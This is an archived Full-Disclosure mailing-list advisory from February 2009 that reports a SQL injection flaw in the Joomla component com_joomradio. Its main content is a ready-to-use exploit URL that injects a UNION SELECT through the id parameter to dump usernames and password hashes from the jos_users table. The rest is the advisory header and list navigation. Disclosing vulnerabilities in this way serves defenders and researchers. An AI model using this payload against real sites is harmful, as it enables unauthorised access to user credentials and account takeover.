[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Joomla Component com_joomradio SQL Injection

To: submit@xxxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx, bugtraq@xxxxxxxxxx
Subject: [Full-disclosure] Joomla Component com_joomradio SQL Injection
From: 0o_zeus_o0 <zeus.olimpusklan@xxxxxxxxx>
Date: Wed, 18 Feb 2009 19:32:02 +0100

###########################################################################
# Advisory X
# Title: Joomla Component com_joomradio SQL Injection
# Author: 0o_zeus_o0 ( Arturo Z. )
# Contact: arturo_zamora_c@xxxxxxxxxxx
# Website: www.securitybroken.com
# Date: 18/02/09
# Risk: Medium
# Vendor Url: http://ajaxportal.eu/
# Affected Software: JoomRadio
# autor script:author XrByte <info@xxxxxx>, Grusha <grusha@xxxxxxxxxxx>
##################################################################
#
#Example:
##################################################################
#htp://
victimurl.com/pathjoomla/index.php?option=com_joomradio&page=show_radio&id=-1UNION
SELECT
user(),concat(username,0x3a,password),user(),user(),user(),user(),user()
FROM jos_users--
#
##################################################################
#greetz:
#
# original advisorie: http://www.securitybroken.com
##################################################################

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- Re: [Full-disclosure] Joomla Component com_joomradio SQL Injection
  - From: Packet Storm

Prev by Date: Re: [Full-disclosure] ICQ 6 protocol bug?
Next by Date: [Full-disclosure] [ MDVSA-2009:042 ] samba
Previous by thread: [Full-disclosure] DDIVRT-2009-20 NetMRI Login Application Cross-site Scripting Vulnerability
Next by thread: Re: [Full-disclosure] Joomla Component com_joomradio SQL Injection
Index(es):
- Date
- Thread